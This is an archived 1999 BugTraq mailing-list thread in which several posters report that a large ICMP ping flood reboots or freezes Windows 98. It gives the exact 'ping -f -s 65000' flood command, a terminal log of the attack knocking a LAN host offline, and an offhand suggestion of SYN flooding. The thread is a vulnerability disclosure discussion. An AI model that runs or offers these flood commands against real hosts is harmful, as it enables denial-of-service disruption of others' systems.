home *** CD-ROM | disk | FTP | other *** search

---

/ Freaks Macintosh Archive / Freaks Macintosh Archive.bin / Freaks Macintosh Archives / Textfiles / zines / Happle / happle10.sit.hqx / Happle#10 / Files / Denial.sit / DoS / windows98.pingflood.txt

< prev

next >

Wrap

Internet Message Format  |  1999-02-21  |  6KB

---

1. Date: Wed, 17 Feb 1999 03:17:26 -0300
2. From: Fabio Bastiglia Oliva <fboliva@SAFENETWORKS.COM>
3. To: BUGTRAQ@netspace.org
4. Subject: Pingflood attack against Windows98
5.  
6. rewt wrote:
7. >
8. > Try pinging the windows box with large amounts of icmp...I left 5
9. > screened pings, each set to 65000 size...Windows will freeze shortly
10. > after its loaded. You might also try to ping with -f.
11. >
12.  
13. Hey...
14.         I made what you suggested, and it's true... But in my case the
15. results were a little worse than yours...
16.         Windows 98 *REBOOTED* after a ping -f 65000... and wasn't need
17. to make several screen boxes... With only one ping -f 65000 the system
18. rebooted.
19.  
20. Best Regards
21. -------------------------------
22. Fabio Bastiglia Oliva - Director
23. fboliva@safenetworks.com
24.  
25. Safe Networks Informatica LTDA.
26. http://www.safenetworks.com
27.  
28. ----------------------------------------------------------------------
29.  
30. Date: Thu, 18 Feb 1999 13:32:00 -0500
31. From: Mark A. Heilpern <heilpern@MINDSPRING.COM>
32. To: BUGTRAQ@netspace.org
33. Subject: Re: Pingflood attack against Windows98
34.  
35. At 03:17 AM 2/17/99 -0300, you wrote:
36. >rewt wrote:
37. >>
38. >> Try pinging the windows box with large amounts of icmp...I left 5
39. >> screened pings, each set to 65000 size...Windows will freeze shortly
40. >> after its loaded. You might also try to ping with -f.
41. >>
42. >
43. >Hey...
44. >       I made what you suggested, and it's true... But in my case the
45. >results were a little worse than yours...
46. >       Windows 98 *REBOOTED* after a ping -f 65000... and wasn't need
47. >to make several screen boxes... With only one ping -f 65000 the system
48. >rebooted.
49.  
50. I issued "ping -f -s 65000 my-win98-address" and after a single return, win98
51. locked up cold. I was ssh'd from win98 to linux to issue the ping, so I might
52. have had more returns than timing allowed to be displayed before I locked
53. up.
54.  
55. ----------------------------------------------------------------------
56.  
57. Date: Thu, 18 Feb 1999 21:44:24 -0300
58. From: Fabio Bastiglia Oliva <fboliva@SAFENETWORKS.COM>
59. To: BUGTRAQ@netspace.org
60. Subject: Re: Pingflood attack against Windows98
61.  
62. Hello all,
63.  
64.         As I said before, forgive me, because my english is not so good!
65.         I'll make a "Multi-reply" in this email... It's easier ;)
66.         Thanks for all the replies!
67.  
68. ------------------------------------------------------------------------
69. ------------------------------------------------------------------------
70. James <pyro@pyro.za.net> wrote:
71. >
72. > This on a LAN or Internet or both?
73. >
74. >         I made this test in my LAN.
75.  
76. -LAN Speed: 10Mbits.
77. -NICs (Network Interface Card): 3Com905btx, Genius, Encore & Realtek.
78. -Hubs: 3Com Super Stack II.
79. -Windows98 Versions: 4.10.1998 (Portuguese and English versions)
80.  
81. ------------------------------------------------------------------------
82. ------------------------------------------------------------------------
83. Laurent LEVIER <llevier@argosnet.com> wrote:
84. >
85. > I tried with the French version of Windows 98.
86. >
87. > when I run ping -l 65000 -f IPaddr.
88. >
89. > ping refuses. Of course ping -f 65000 is not accepted too.
90. >
91. > Strange the ping command changes between US & FR version.
92. >
93.  
94.         Sorry, I made a mistake when sent the email to Bugtraq. The
95. correct command (From Linux Slackware 3.6 Kernel 2.0.36) line is:
96.  
97.                 ping -f -s 65000 IPaddr
98.  
99. ------------------------------------------------------------------------
100. ------------------------------------------------------------------------
101. Quantum <fusion77@bellsouth.net> wrote:
102. >
103. > I just tried it & had no success at my Win98 dos prompt,
104. >
105.  
106.         Try from a linux... I got these results flooding from a
107. Linux Slackware 3.6 Kernel 2.0.36...
108.  
109. ------------------------------------------------------------------------
110. ------------------------------------------------------------------------
111. Tom Van Riper <tomv@dreamscape.com>
112. >
113. > yeah no kidding, the world has known a dialup connection weither it be
114. > windows or a unix type operating system, that a small amount of icmp
115. > packets will kill the connection for years, thats old stuff.
116. > try synfluding on ports 0-65535 for some real fun ;)
117.  
118.         Hehe... But a synflood just made the LAN Communication slower,
119. and didn't affected Windows 98 than pingflood affected!
120.  
121. Tom Van Riper
122. Dreamscape Online
123.  
124. ------------------------------------------------------------------------
125.  
126. Best Regards
127. -------------------------------
128. Fabio Bastiglia Oliva - Diretor
129. fboliva@safenetworks.com
130.  
131. Safe Networks Informatica LTDA.
132. http://www.safenetworks.com
133.  
134. ----------------------------------------------------------------------
135.  
136. Date: Fri, 19 Feb 1999 01:16:44 -0300
137. From: Fabio Bastiglia Oliva <fboliva@SAFENETWORKS.COM>
138. To: BUGTRAQ@netspace.org
139. Subject: Pingflood attack against Windows98 - The Test
140.  
141. Hello all,
142.  
143.          This is what is happening when I ping flood a Windows98 from a
144. Linux Slackware 3.6 (Kernel 2.0.36).
145.  
146.  
147. -Before the attack-
148.  
149. linux:~# ping 192.168.1.4
150. PING 192.168.1.4 (192.168.1.4): 56 data bytes
151. 64 bytes from 192.168.1.4: icmp_seq=0 ttl=128 time=0.5 ms
152. 64 bytes from 192.168.1.4: icmp_seq=1 ttl=128 time=0.5 ms
153.  
154. --- 192.168.1.4 ping statistics ---
155. 2 packets transmitted, 2 packets received, 0% packet loss
156. round-trip min/avg/max = 0.5/0.5/0.5 ms
157.  
158.  
159. -The Attack-
160.  
161. linux:~# ping -f -s 65000 192.168.1.4
162. PING 192.168.1.3 (192.168.1.4): 65000 data bytes
163. .......................................................................
164. ...................................................../*After lots of
165. little dots... Windows98 Rebooted*/...<CTRL+C>
166.  
167. --- 192.168.1.4 ping statistics ---
168. 11440 packets transmitted, 228 packets received, 98% packet loss
169. round-trip min/avg/max = 0.6/32.0/64.2 ms
170.  
171.  
172. -After the attack-
173.  
174. linux:~# ping 192.168.1.4
175. PING 192.168.1.4 (192.168.1.4): 56 data bytes
176.  
177. --- 192.168.1.4 ping statistics ---
178. 4 packets transmitted, 0 packets received, 100% packet loss
179.  
180. ---
181.  
182.         It's what's happening here... Anyone of you got the same
183. results?
184.  
185. Best Regards
186. --------------------------------
187. Fabio Bastiglia Oliva - Director
188. fboliva@safenetworks.com
189.  
190. Safe Networks Informatica LTDA.
191. http://www.safenetworks.com
192.  
193.